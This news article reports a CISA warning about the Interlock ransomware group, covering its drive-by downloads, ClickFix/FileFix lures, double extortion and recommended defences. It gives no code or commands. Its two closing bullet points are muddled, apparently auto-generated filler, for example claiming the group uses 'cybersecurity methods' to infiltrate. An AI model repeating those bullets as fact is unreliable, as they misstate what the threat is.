Ransomware group Interlock is stepping up its operations, according to a warning issued by the Cybersecurity and Infrastructure Security Agency (CISA)
In recent months, the Interlock ransomware group has been actively targeting businesses, critical infrastructure, and organizations, particularly in North America and Europe. The group's operations are classified as ransomware-as-a-service, and they have been observed adopting new techniques to evade detection and improve attack success.
### Initial Access
The Interlock group frequently gains initial access by compromising legitimate websites and using them to deliver malicious payloads via drive-by downloads. This method, while uncommon among ransomware groups, is a highly effective way for Interlock to infiltrate systems. Additionally, the group has been known to use social engineering techniques such as ClickFix and the newer FileFix technique, which exploit trusted Windows UI elements to execute malicious code.
### Post-Compromise Activities
Once inside a network, Interlock actors use various tools and methods for discovering assets, stealing credentials, and moving laterally across the network. The group employs a double extortion model, first exfiltrating sensitive data and then encrypting systems. This tactic puts pressure on victims to pay ransoms to both decrypt their files and prevent the publication or sale of stolen data.
### Technical Details and Defense
The gang uses encryptors designed for both Windows and Linux, including the ability to encrypt virtual machines, broadening their attack surface. The group is observed adopting new techniques, such as the FileFix method, to evade detection and improve attack success. U.S. agencies provide detailed mappings of Interlock’s tactics, techniques, and procedures (TTPs) to the MITRE ATT&CK® framework for enterprise, aiding defenders in detection and response.
### Recommended Mitigations
CISA and partner agencies advise organizations to implement DNS filtering and web access firewalls, keep all systems and software updated, segment networks, enforce robust identity, credential, and access management (ICAM), train staff to recognize and resist social engineering attempts, and monitor for indicators of compromise (IOCs).
Interlock’s combination of technical sophistication, social engineering, and aggressive extortion tactics make it a significant and evolving threat to organizations globally, especially in sectors where disruption and data exposure carry severe consequences. To counter this threat, it is crucial for organizations to prioritize proactive defenses such as regular patching, network segmentation, and staff training.
As of current data, Interlock has carried out a total of 33 confirmed and unconfirmed attacks since last October. The US Cybersecurity and Infrastructure Security Agency (CISA) has issued a warning about Interlock, stating that the group is stepping up its attacks and changing tactics. Organizations are encouraged to stay vigilant and follow the recommended mitigations to protect themselves from this growing threat.
- To address the growing threat posed by the Interlock ransomware group, organizations should prioritize cybersecurity measures in their data-and-cloud-computing infrastructure, especially in the areas of technology, network segmentation, and proactive defenses such as regular patching.
- As the Interlock group continues to evolve its tactics, including the use of cybersecurity methods to infiltrate critical infrastructure, it's crucial for businesses and organizations to focus on enhancing their cybersecurity, incorporating defense strategies like robust data-and-cloud-computing infrastructure and staff training in social engineering awareness.
){kind=link}